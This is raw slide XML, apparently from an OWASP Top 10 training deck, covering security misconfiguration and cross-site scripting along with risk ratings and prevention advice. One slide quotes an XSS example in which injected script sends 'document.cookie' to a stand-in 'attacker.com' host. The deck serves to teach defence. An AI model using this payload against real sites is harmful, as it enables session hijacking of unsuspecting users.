            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Are the security settings in your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AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For web applications, does the server not send security directives to client agents (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Security Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) or are they not set to secure values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Is any of your software out of date? (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"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en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Without a concerted, repeatable application security configuration process, systems are at a higher risk.</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4"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Security Configuration (V11 and V19)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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900"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CWE Entry 2 on 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AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure installation processes should be implemented, including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans"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800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remove or do not install any unnecessary features, components, documentation and samples. Remove unused dependencies and frameworks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A process to triage and deploy all updates and patches in a timely manner to each deployed environment. This process needs to include all frameworks, dependencies, components, and libraries (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"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AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A strong application architecture that provides effective, secure separation between components, with segmentation, containerization, or cloud security groups (ACLs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An automated process to verify the effectiveness of the configurations and settings in all environments.</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solidFill>
            <a:srgbClr val="83276B"/>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4161005981"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="OpenSymbol"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical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200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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gn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers will often attempt to access default accounts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, frameworks, and custom code. Automated scanners are useful for detecting  misconfigurations, use of default accounts or configurations, unnecessary services, legacy options etc.</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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. The business impact depends on the protection needs of your application and data.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans"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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'</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value=</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("CC")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&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <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foo=</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Note that attackers can use XSS to defeat any  automated CSRF defense the application might employ. </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three forms of XSS, usually targeting users' browsers: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Reflected XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Your application or API includes unvalidated and  unescaped user input as part of HTML output or there is no content security policy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malicious advertisements, or similar.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Stored XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Your application or API stores unsanitized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DOM XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JavaScript frameworks, single page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs.</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Typical XSS attacks include session stealing, account takeover, MFA bypass, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM node replacement or defacement (such as trojan login panels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.</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#3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#4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10"/>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11"/>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12"/>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800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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15"/>
              </a:rPr>
              <a:t>CWE-79: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>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6"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>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Preventing XSS requires separation of untrusted data from active browser content.</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Use safer frameworks that automatically escape for XSS by design, such as in Ruby 3.0 or React JS, or leverage framework XSS protections</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XSS Prevention Cheat Sheet</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has details on the required data escaping techniques.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Applying context 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1"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</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Enabling a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7"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</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is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal overwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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1532178074"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
